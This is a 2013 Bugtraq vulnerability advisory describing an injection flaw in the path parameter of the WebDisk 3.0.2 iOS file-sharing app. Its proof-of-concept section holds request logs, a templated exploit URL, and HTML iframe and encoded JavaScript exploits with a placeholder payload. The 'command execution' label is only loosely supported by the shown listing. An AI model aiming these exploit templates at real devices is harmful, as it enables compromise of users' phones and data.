[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-07-28 20:59:39
Message-ID: 51F5863B.3090606 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
Date:
=====
2013-07-27
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1035
VL-ID:
=====
1035
Common Vulnerability Scoring System:
====================================
8.8
Introduction:
=============
WebDisk lets your iphone/ipad become a file website over wi-fi netwrk.You can \
upload/download your document to your iphone/ipad on your pc browser over wi-fi and \
it is also a document viewer. Lets you direct view your document on your \
iphone/iphone.
( Copy of the Homepage: https://itunes.apple.com/us/app/webdisk/id546221210 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a remote code execution \
vulnerability in the WebDisk v3.0.2 application (Apple iOS - iPad & iPhone).
Report-Timeline:
================
2013-07-27: Public Disclosure (Vulnerability Laboratory)
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: WebDisk PhotoViewer - Application 3.0.2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A remote command execution web vulnerability is detected in the WebDisk v3.0.2 \
application (Apple iOS - iPad & iPhone). The vulnerability allows remote attacker to \
execute code inside of a vulnerable web application module to compromise the device.
The vulnerability is located in the afgetdir.ma file when processing to request \
manipulated path parameters. Remote attackers can execute code from the main \
application index by using the upload input field. The code inside of the file upload \
field does not require to choose a file for an upload but executes the context \
directly via GET variable. The result is a web application code execution from the \
main index module. The code will be executed from the listing location under the \
upload input field of the webdisk wifi application.
Exploitation of the vulnerability does not require user interaction or a privilege \
application user account. Successful exploitation results webdisk web-application or \
apple device compromise via remote code execution.
Vulnerable Module(s):
[+] Upload - Input Field
Vulnerable File(s):
[+] afgetdir.ma
Vulnerable Parameter(s):
[+] p (path)
Affected Module(s):
[+] Index File Dir Listing
Proof of Concept:
=================
The remote command execution vulnerability can be exploited by remote attackers \
without privilege application user account or user interaction. For demonstration or \
reproduce ...
--- Exploitation Request Session Logs ---
Status: 200[OK]
GET http://192.168.2.104:1861/aadd.htm
Load Flags[LOAD_BACKGROUND ] Content Size[641] Mime \
Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]
Connection[keep-alive]
Response Headers:
Content-Length[641]
Server[MHttpServer/1.0.0]
Status: 200[OK]
GET http://192.168.2.104:1861/[CODE EXECUTION]+PATH
Load Flags[LOAD_DOCUMENT_URI ]
Content Size[0]
Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]
Connection[keep-alive]
Response Headers:
Content-Length[0]
Server[MHttpServer/1.0.0]
URL=http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications
%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[CODE EXECUTION]
Status: 200[OK]
GET http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CW%5C[CODE \
EXECUTION] Load Flags[LOAD_NORMAL] Content Size[20217] Mime \
Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 \
Firefox/22.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer
[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C] \
Connection[keep-alive]
Response Headers:
Content-Length[20217]
Server[MHttpServer/1.0.0]
--- Exploitation Request Session Logs ---
Reference(s): mHTTP Web-Server
http://localhost:1861/
http://localhost:1861/mjs.js
http://localhost:1861/aadd.htm
http://localhost:1861/afgetthum.ma
PoC Example:
[HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH VAR]/[DIRECTION]%5C[ID]%5C[DOCUMNETS \
PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH WDisk]%5C[COMMAND EXECUTION]
PoC Link:
http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND \
EXECUTION]
PoC: Exploit 1 - HTML
<html>
<head><body><title>WebDisk v3.0.2 - Command Execution Vulnerability - Remote \
PoC</title> <iframe src=http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA
56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION] width=800 height=800>
</body></head>
<html>
PoC: Exploit 2 - JS
<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3EWebDisk%20v3.0.2%20-%20Command%20Execution%20Vulnerability%20
-%20Remote%20PoC%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications
%255C8D137E49-3793-4C45-9A50-B8AF3AE7EA%0A56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%20width%3D800%20height%3D800
%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>
Review Source: tdmid
<td colspan="3" height="1"><hr class="spline"></td>
</tr>
<tr>
<td class="tdleft"><a href=""><img class="imgthum" \
src="afico/files_txt.png"></a></td> <td class="tdmid">>"[CODE EXECUTION \
VULNERABILITY!]</td> <td class="tdright">7-26 19:51<br/><br/><a \
href="afdelete.ma?p=%5Cvar%5Cmobile%5CApplications \
%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txt">delete</a></td>
</tr>
<tr>
<td colspan="3" height="1"><hr class="spline" /></td>
</tr>
Solution:
=========
To fix the command execution parse the p variable and encode the input on direct GET \
requests. Parse and encode the output listing of the file input in the main file dir \
index module.
Risk:
=====
The security risk of the remote command execution web application vulnerability is \
estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(bkm@evolution-sec.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic